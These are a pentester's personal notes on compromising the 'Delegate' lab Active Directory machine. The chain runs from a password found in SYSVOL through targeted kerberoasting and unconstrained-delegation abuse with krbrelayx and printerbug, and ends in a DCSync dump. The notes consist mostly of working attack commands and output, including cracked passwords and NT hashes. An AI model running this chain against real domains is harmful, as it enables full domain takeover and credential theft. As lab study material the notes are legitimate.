Delegate

This is not a writeup, just my notes about the machine.

Operating System:

Chain: False

Credentials

Username

Password

Method

Scope

A.Briggs

P4ssw0rd1#123

Found in file

Domain User

N.Thompson

KALEB_2341

GenericWrite + Append fake SPN

Domain User

✅ Valid Usernames

Administrator@delegate.vl
R.Cooper@delegate.vl
J.Roberts@delegate.vl
Guest@delegate.vl
N.Thompson@delegate.vl
A.Briggs@delegate.vl
DC1$@delegate.vl

🔑 Passwords list

P4ssw0rd1#123
KALEB_2341

Information Gathering

Nmap Scan

# Nmap 7.94SVN scan initiated Mon Apr  7 20:52:22 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_delegate_tcp_allports -vvv 10.10.77.192
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-08 00:59:02Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49683/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49685/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56221/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56250/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Service Enumeration

DNS

Not Vulnerable to DNS Zone Transfer

SMB (enum4linux-ng)

Domain SID: S-1-5-21-1484473093-3449528695-2030935120

Server allows null session authentication
Server allows guest session authentication
- RID-Enumeration returned a list of valid usernames
- IPC$, NETLOGON and SYSVOL possesses Write permissions

Finding a password in file SYSVOL

File: /SYSVOL/delegate.vl/scripts/users.bat
-----------------------------------------------------------------------------------------
rem @echo off
net use * /delete /y
net use v: \\dc1\development 

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123

❯ nxc smb 10.10.77.192 -u users.txt -p 'P4ssw0rd1#123' --continue-on-success
SMB         10.10.77.192    445    DC1              [+] delegate.vl\A.Briggs:P4ssw0rd1#123

Not kerberoastable users
Not asreproastable users

Bloodhound enumeration

❯ bloodhound-python -c all --zip -ns 10.10.77.192 -u A.Briggs -p 'P4ssw0rd1#123' -d delegate.vl
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 32S
INFO: Compressing output into 20250407212413_bloodhound.zip

Exploitation

Abusing DACL to compromise user

Assigning fake SPN to make the user kerberoastable

❯ python3 targetedKerberoast.py -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123' --request-user 'N.Thompson'
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$4568b4ebc9930ccc1f48ea83c45b0727$2131c12dcdfe15c1054bbbe66f5ad4168fa021765b723baf34fba30b9c5f04180ea273a924faa4111251f8e41c430c6707109626626166b96666699623935bb0d10cd5a441440f9698371a9d7ad75aad18105f6e7b09fa448d164428c2689cc34dcc87c2f1f390fcc73b41e002d172c4f989c22ee6d8f9fa322fa0b0c23cd3fcf6652ba1b1e90d859071c4c8c7aa67556cc41fc74656397c42d3399ac9d6fb7512625a4f9e3cf6316c84682b473473bf84212040f4a7b3da58294d496f8641378f466719d3da2a1ffa972abab521bcbe10cca70dd1fa0a883d16c4ebda634c4f86fdce3f33a399adc062a70b17e77615a1941fd6f453f52f1f35586d7a998a9e8195a41df449294d4ad3e58dbc4220cab98a90481e3bbc615276dc1638a42dfeb68a11a3a82c32eaee70ac2ee8464a5c19ed19b8709e20cee499a9399e96cc3676155b1b13bb6ebe1100a6986c6392c1ea8fc263b7f605e475ae30ea11f2daa5754e385fd88cda55aa06f3de5910ea97e8feafbbe45dc3cca224eac35efe3d1816e4647ae8e712525943e9347aec90b9204820c15b07fe02b53ddd2ecbf4bf3742b5473ff7f941aa8056bd9d5bf85887fa2bc584405d4b0740b6b684f57cfb72d430d21f67c829cf09a48121ddaead2908b2064f7c90f66b714740644c672e0a07027cd2dc96e18aa431c28f73c78cd219c7fb32cfd458f1ce4faee5c402ee89f438c6637fc40d6ef6eb4fc641323ae266fff6ff514edcfb2c569fe3958ef5929d5e9424671f4be65a72ab976850d1b3b92a3ceffe67d4f136dcad09af6359e9365afbcb390efa88cf63cf5a57d4afb4c2e3591d54902307bb0cfba069645220adca76e87432b4c8e3179269a96865e17aca0d66e97ad147f625bab4c64af8958f5bc14c232bb530a392d07e2bb0b070a5bd0ea3f8e749925e8a75b3267f797f7e7e0d35ee8c9365e4ab8eb1239a148e3eaf00ff4138f94c57ae531adec0ac132eb0bcc9480a3ead5e85d5169a5d4f6659eee2b59a4904ff3d4735b84e84e5dc1e41c4b1421cc92eeb56573d3196f07e6484f839abe7a5783e573fce7ced22ed07af9254d3787569be258f3037ce8edf02f54d9150ff5c5793dd2b7f6b5310fbf965d54a0ac391b910b3c0879d17b28ab02fb54579f3ad5af4bbbbdb841ec2cff915d03ef8dee229b0587a39bf55d0d0a37f8aafa758da6eb070c8c7f6f007bcc41b38fc45a709987f3375f5090cab451a4bf5dd0d3ba61435184f1b20fea24bf954fe5bf1caea16448c95b20abc2a6ba08c75f1cf0ce235c74c82bd1b5ca24450d8194b94dddb252459c53d545a537c2bac495eddce03d0c3f3e5eb66d46ac6944803179bd4b4cfb22bd1e7adfcbbd39d7ace43ace09dae64e1ca186d923d180e1aac22995a8c7d985c3bf3121053271899a151d6834af1b25d2a444bf37bf90b881dc6

❯ hashcat -m 13100 n.thompson.kerberoast /usr/share/wordlists/rockyou.txt
<SNIF>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$4568b4ebc99<SNIF>:KALEB_2341

Domain Compromise

Situational Awareness

*Evil-WinRM* PS C:\Users\N.Thompson\Documents> whoami /all

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ==================================================
DELEGATE\delegation admins                  Group            S-1-5-21-1484473093-3449528695-2030935120-1121 Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                                    State
============================= ============================================================== =======                                Enabled
SeMachineAccountPrivilege     Add workstations to domain                                     Enabled
SeEnableDelegationPrivilege   Enable computer and user accounts to be trusted for delegation Enabled

Windows

Adding Computer to the domain controller

*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount EVIL -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account EVIL added

Enabling unconstrained delegation

UserAccountControl Values: useraccountcontrol-manipulate-account-properties

Property flag

Value in decimal

Why?

WORKSTATION_TRUST_ACCOUNT

4096

Indicate is a machine account (mandatory)

TRUSTED_FOR_DELEGATION

524288

Enable Unconstrained Delegation

Total: 524288 + 4096 = 528384

#Enable unconstrained delegation by setting the userAccountControl attribute to 528384
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount evil -Attribute useraccountcontrol -Value 528384
[+] Machine account evil attribute useraccountcontrol updated

Adding a malicious HTTP SPN

Note: make computer look like a real service by adding SPN HTTP/EVIL.delegate.vl

*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount evil -Attribute ServicePrincipalName -Value HTTP/EVIL.delegate.vl -Append
[+] Machine account evil attribute ServicePrincipalName appended

Checking the configuration applied

*Evil-WinRM* PS C:\Users\N.Thompson\Documents>  Get-MachineAccountAttribute -MachineAccount evil -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=evil,CN=Computers,DC=delegate,DC=vl
HTTP/EVIL.delegate.vl
RestrictedKrbHost/EVIL
HOST/EVIL
RestrictedKrbHost/EVIL.delegate.vl
HOST/EVIL.delegate.vl

Adding a malicious DNS

❯ python3 dnstool.py -u 'delegate.vl\evil$' -p 'Password123' -r evil.delegate.vl -d 10.8.5.48 -a add dc1.delegate.vl -dns-ip 10.10.111.117
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Take time to replicate you can use nslookup evil.delegate.vl dc1.delegate.vl to sure is replicated into AD.

Running Krbrelayx to capture TGT

❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71

Use: pypykatz crypto nt 'Password123'

Coercing the authentication to malicious dns

❯ python3 printerbug.py delegate.vl/'EVIL$:Password123'@10.10.111.117 evil.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attempting to trigger authentication via rprn RPC at 10.10.111.117
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

Capturing the NT Hash via unconstrated delegation

❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.111.117
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.111.117
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.111.117
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

Performing DCSync Attack against domain controller.

❯ KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc1.delegate.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
<SNIF>

Linux

Creating a machine account

❯ impacket-addcomputer  delegate.vl/N.Thompson:KALEB_2341 -computer-name z3r0 -computer-pass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account z3r0$ with password Password123.

Adding the UserControlAccount attributes

❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl add uac 'z3r0$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to z3r0$'s userAccountControl

❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl add uac 'z3r0$' -f WORKSTATION_TRUST_ACCOUNT
[-] ['WORKSTATION_TRUST_ACCOUNT'] property flags added to z3r0$'s userAccountControl

❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl get object 'z3r0$' --attr 'useraccountcontrol'

Adding HTTP/CIFS SPN's to rogue computer

❯ python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'HTTP/z3r0.delegate.vl' -t 'z3r0$' -dc-ip 10.10.79.76 dc1.delegate.vl
❯ python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'CIFS/z3r0.delegate.vl' -t 'z3r0$' -dc-ip 10.10.79.76 dc1.delegate.vl

Checking the ServicePrincipalName

bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl get object 'z3r0$' --attr 'serviceprincipalname'

Running Krbrelayx to capture TGT

❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80

Coercing the authentication to malicious dns

❯ python3 printerbug.py 'delegate.vl/z3r0$:Password123'@10.10.79.76 z3r0.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attempting to trigger authentication via rprn RPC at 10.10.79.76
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

Output from krbrelayx and printerbugshe;

[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.79.76
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.79.76
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.79.76
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

Performing DCSync Attack

❯ KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc1.delegate.vl -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f877adcb278c4e178c430440573528db38631785a0afe9281d0dbdd10774848c
Administrator:aes128-cts-hmac-sha1-96:3a25aca9a80dfe5f03cd03ea2dcccafe
Administrator:des-cbc-md5:ce257f16ec25e59e
[*] Cleaning up...

Last updated 6 months ago

hashtagCredentials

hashtagInformation Gathering

hashtagService Enumeration

hashtagDNS

hashtagSMB (enum4linux-ng)

hashtagFinding a password in file SYSVOL

hashtagBloodhound enumeration

hashtagExploitation

hashtagAbusing DACL to compromise user

hashtagAssigning fake SPN to make the user kerberoastable

hashtagDomain Compromise

hashtagSituational Awareness

hashtagWindows

hashtagAdding Computer to the domain controller

hashtagEnabling unconstrained delegation

hashtagAdding a malicious HTTP SPN

hashtagChecking the configuration applied

hashtagAdding a malicious DNS

hashtagRunning Krbrelayx to capture TGT

hashtagCoercing the authentication to malicious dns

hashtagCapturing the NT Hash via unconstrated delegation

hashtagPerforming DCSync Attack against domain controller.

hashtagLinux

hashtagCreating a machine account

hashtagAdding the UserControlAccount attributes

hashtagAdding HTTP/CIFS SPN's to rogue computer

hashtagChecking the ServicePrincipalName

hashtagRunning Krbrelayx to capture TGT

hashtagCoercing the authentication to malicious dns

hashtagOutput from krbrelayx and printerbugshe;

hashtagPerforming DCSync Attack

Credentials

Information Gathering

Service Enumeration

DNS

SMB (enum4linux-ng)

Finding a password in file SYSVOL

Bloodhound enumeration

Exploitation

Abusing DACL to compromise user

Assigning fake SPN to make the user kerberoastable

Domain Compromise

Situational Awareness

Windows

Adding Computer to the domain controller

Enabling unconstrained delegation

Adding a malicious HTTP SPN

Checking the configuration applied

Adding a malicious DNS

Running Krbrelayx to capture TGT

Coercing the authentication to malicious dns

Capturing the NT Hash via unconstrated delegation

Performing DCSync Attack against domain controller.

Linux

Creating a machine account

Adding the UserControlAccount attributes

Adding HTTP/CIFS SPN's to rogue computer

Checking the ServicePrincipalName

Running Krbrelayx to capture TGT

Coercing the authentication to malicious dns

Output from krbrelayx and printerbugshe;

Performing DCSync Attack